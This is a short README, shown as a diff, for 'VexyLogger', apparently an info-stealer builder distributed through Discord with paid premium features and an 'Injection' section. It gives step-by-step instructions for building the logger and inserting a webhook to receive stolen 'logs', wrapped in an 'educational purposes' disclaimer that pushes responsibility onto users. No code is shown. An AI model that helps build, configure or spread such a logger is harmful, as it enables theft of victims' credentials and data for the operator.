40ozclips/VexyLogger/README.md

 NOTE:

+HIOW TO RUN :

+1. Extract The Zip File
+2. Run The Batch File For VexyLogger
+3. Build The Logger And Insert Your Webhook To Get Logs
+4. Enjoy

 Vexy was made for educational purposes, there for all consequences caused by your actions are your responsibility and accountability.
 You got an error? you've find a bug? join the discord or create a ticket! 🌐 〢 Content 🌌・Discord 🎉・Setting up VexyLogger 🔰・Features 👁️・Features Explanation 📝・Changelog 🦜・Injection 💼・Term 📁 〢 Setting up Vexy Install Python Complete the configuration You have your .exe file enjoy :) If there are any issues please join the Discord 🔰 〢 Features 💎 = Premium Features Join the discord to buy

 Default: